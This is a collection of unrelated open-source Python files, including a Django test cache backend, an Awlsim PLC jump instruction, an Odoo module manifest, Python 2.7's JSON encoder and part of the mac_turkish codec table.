output_xml = args.output_xml
tree = ET.parse(input_xml)
root = tree.getroot()
tooldir = root.attrib["tool_path"]
children = root.getchildren()
removed_tools = check_child(root, children, tooldir)
print "tool xml not found for the follwing tools, removing entries from output xml:"
for tool in removed_tools:
print tool
with open(output_xml, "w") as output:
output.write(ET.tostring(root))
if __name__ == "__main__":
__main__()
|
joakim-hove/django | refs/heads/master | tests/cache/liberal_backend.py | 446 | from django.core.cache.backends.locmem import LocMemCache
class LiberalKeyValidationMixin(object):
def validate_key(self, key):
pass
class CacheClass(LiberalKeyValidationMixin, LocMemCache):
pass
|
Vignesh2208/Awlsim | refs/heads/master | awlsim/core/instructions/insn_spbin.py | 2 | # -*- coding: utf-8 -*-
#
# AWL simulator - instructions
#
# Copyright 2012-2014 Michael Buesch <m@bues.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from __future__ import division, absolute_import, print_function, unicode_literals
from awlsim.common.compat import *
from awlsim.core.instructions.main import * #@nocy
from awlsim.core.operators import *
#from awlsim.core.instructions.main cimport * #@cy
class AwlInsn_SPBIN(AwlInsn): #+cdef
__slots__ = ()
def __init__(self, cpu, rawInsn):
AwlInsn.__init__(self, cpu, AwlInsn.TYPE_SPBIN, rawInsn)
self.assertOpCount(1)
if self.ops[0].type != AwlOperator.LBL_REF:
raise AwlSimError("Jump instruction expects label operand")
def run(self):
#@cy cdef S7StatusWord s
s = self.cpu.statusWord
if not s.BIE:
self.cpu.jumpToLabel(self.ops[0].labelIndex)
s.OR, s.STA, s.NER = 0, 1, 0
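# SPBIN semantics as implemented above: jump to the label operand when the
# BIE (binary result) bit is 0; in either case OR/STA/NER end up 0/1/0.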
|
randomshinichi/QRL | refs/heads/master | src/qrl/crypto/__init__.py | 5 | # coding=utf-8
# Python hash signature library (quantum resistant)
|
shaufi/odoo | refs/heads/8.0 | addons/product_expiry/__openerp__.py | 260 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Products Expiry Date',
'version' : '1.0',
'author' : 'OpenERP SA',
'category' : 'Specific Industry Applications',
'website': 'https://www.odoo.com',
'depends' : ['stock'],
'demo' : ['product_expiry_demo.xml'],
'description': """
Track different dates on products and production lots.
======================================================
Following dates can be tracked:
-------------------------------
- end of life
- best before date
- removal date
- alert date
Also implements the removal strategy First Expiry First Out (FEFO) widely used, for example, in food industries.
""",
'data' : ['product_expiry_view.xml', 'product_expiry_data.xml'],
'auto_install': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cloudfoundry/php-buildpack-legacy | refs/heads/master | builds/runtimes/python-2.7.6/lib/python2.7/json/encoder.py | 105 | """Implementation of JSONEncoder
"""
import re
try:
from _json import encode_basestring_ascii as c_encode_basestring_ascii
except ImportError:
c_encode_basestring_ascii = None
try:
from _json import make_encoder as c_make_encoder
except ImportError:
c_make_encoder = None
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
ESCAPE_DCT = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i))
#ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
INFINITY = float('inf')
FLOAT_REPR = repr
def encode_basestring(s):
"""Return a JSON representation of a Python string
"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string
"""
if isinstance(s, str) and HAS_UTF8.search(s) is not None:
s = s.decode('utf-8')
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return '\\u{0:04x}'.format(n)
#return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u{0:04x}\\u{1:04x}'.format(s1, s2)
#return '\\u%04x\\u%04x' % (s1, s2)
return '"' + str(ESCAPE_ASCII.sub(replace, s)) + '"'
encode_basestring_ascii = (
c_encode_basestring_ascii or py_encode_basestring_ascii)
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8', default=None):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If *ensure_ascii* is true (the default), all non-ASCII
characters in the output are escaped with \uXXXX sequences,
and the results are str instances consisting of ASCII
characters only. If ensure_ascii is False, a result may be a
unicode instance. This usually happens if the input contains
unicode strings or the *encoding* parameter is used.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation. Since the default
item separator is ', ', the output might include trailing
whitespace when indent is specified. You can use
separators=(',', ': ') to avoid this.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
if default is not None:
self.default = default
self.encoding = encoding
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
raise TypeError(repr(o) + " is not JSON serializable")
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8')):
o = o.decode(_encoding)
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return ''.join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
if self.encoding != 'utf-8':
def _encoder(o, _orig_encoder=_encoder, _encoding=self.encoding):
if isinstance(o, str):
o = o.decode(_encoding)
return _orig_encoder(o)
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
if (_one_shot and c_make_encoder is not None
and self.indent is None and not self.sort_keys):
_iterencode = c_make_encoder(
markers, self.default, _encoder, self.indent,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, self.allow_nan)
else:
_iterencode = _make_iterencode(
markers, self.default, _encoder, self.indent, floatstr,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, _one_shot)
return _iterencode(o, 0)
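# A quick check of both entry points (expected output shown):
#   JSONEncoder(sort_keys=True).encode({'b': 1, 'a': [True, None]})
#   # -> '{"a": [true, null], "b": 1}'
#   ''.join(JSONEncoder().iterencode([1, 2.5]))  # -> '[1, 2.5]'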
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
basestring=basestring,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
long=long,
str=str,
tuple=tuple,
):
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (' ' * (_indent * _current_indent_level))
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, basestring):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, (int, long)):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (_indent * _current_indent_level))
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (' ' * (_indent * _current_indent_level))
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.iteritems()
for key, value in items:
if isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, (int, long)):
key = str(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, basestring):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, (int, long)):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (_indent * _current_indent_level))
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, basestring):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
elif isinstance(o, (list, tuple)):
for chunk in _iterencode_list(o, _current_indent_level):
yield chunk
elif isinstance(o, dict):
for chunk in _iterencode_dict(o, _current_indent_level):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
for chunk in _iterencode(o, _current_indent_level):
yield chunk
if markers is not None:
del markers[markerid]
return _iterencode
|
eckucukoglu/arm-linux-gnueabihf | refs/heads/master | arm-linux-gnueabihf/libc/usr/lib/python2.7/encodings/mac_turkish.py | 593 | """ Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-turkish',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
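# Once the codec is registered (e.g. found via the encodings search path), it
# works like any other; a hypothetical round trip using the table below:
#   u'\u011f'.encode('mac-turkish')  # -> '\xdb'
#   '\xdb'.decode('mac-turkish')     # -> u'\u011f'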
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x81 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe3' # 0x8B -> LATIN SMALL LETTER A WITH TILDE
u'\xe5' # 0x8C -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\xec' # 0x93 -> LATIN SMALL LETTER I WITH GRAVE
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf2' # 0x98 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u2020' # 0xA0 -> DAGGER
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\xb4' # 0xAB -> ACUTE ACCENT
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\xc6' # 0xAE -> LATIN CAPITAL LETTER AE
u'\xd8' # 0xAF -> LATIN CAPITAL LETTER O WITH STROKE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\xa5' # 0xB4 -> YEN SIGN
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u220f' # 0xB8 -> N-ARY PRODUCT
u'\u03c0' # 0xB9 -> GREEK SMALL LETTER PI
u'\u222b' # 0xBA -> INTEGRAL
u'\xaa' # 0xBB -> FEMININE ORDINAL INDICATOR
u'\xba' # 0xBC -> MASCULINE ORDINAL INDICATOR
u'\u03a9' # 0xBD -> GREEK CAPITAL LETTER OMEGA
u'\xe6' # 0xBE -> LATIN SMALL LETTER AE
u'\xf8' # 0xBF -> LATIN SMALL LETTER O WITH STROKE
u'\xbf' # 0xC0 -> INVERTED QUESTION MARK
u'\xa1' # 0xC1 -> INVERTED EXCLAMATION MARK
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\xc0' # 0xCB -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc3' # 0xCC -> LATIN CAPITAL LETTER A WITH TILDE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0152' # 0xCE -> LATIN CAPITAL LIGATURE OE
u'\u0153' # 0xCF -> LATIN SMALL LIGATURE OE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\xff' # 0xD8 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\u0178' # 0xD9 -> LATIN CAPITAL LETTER Y WITH DIAERESIS
u'\u011e' # 0xDA -> LATIN CAPITAL LETTER G WITH BREVE
u'\u011f' # 0xDB -> LATIN SMALL LETTER G WITH BREVE
u'\u0130' # 0xDC -> LATIN CAPITAL LETTER I WITH DOT ABOVE
u'\u0131' # 0xDD -> LATIN SMALL LETTER DOTLESS I
u'\u015e' # 0xDE -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\u015f' # 0xDF -> LATIN SMALL LETTER S WITH CEDILLA
u'\u2021' # 0xE0 -> DOUBLE DAGGER
u'\xb7' # 0xE1 -> MIDDLE DOT
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2030' # 0xE4 -> PER MILLE SIGN
u'\xc2' # 0xE5 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xca' # 0xE6 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xcb' # 0xE8 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0xE9 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xEB -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xEC -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\xcc' # 0xED -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\uf8ff' # 0xF0 -> Apple logo
u'\xd2' # 0xF1 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xF3 -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
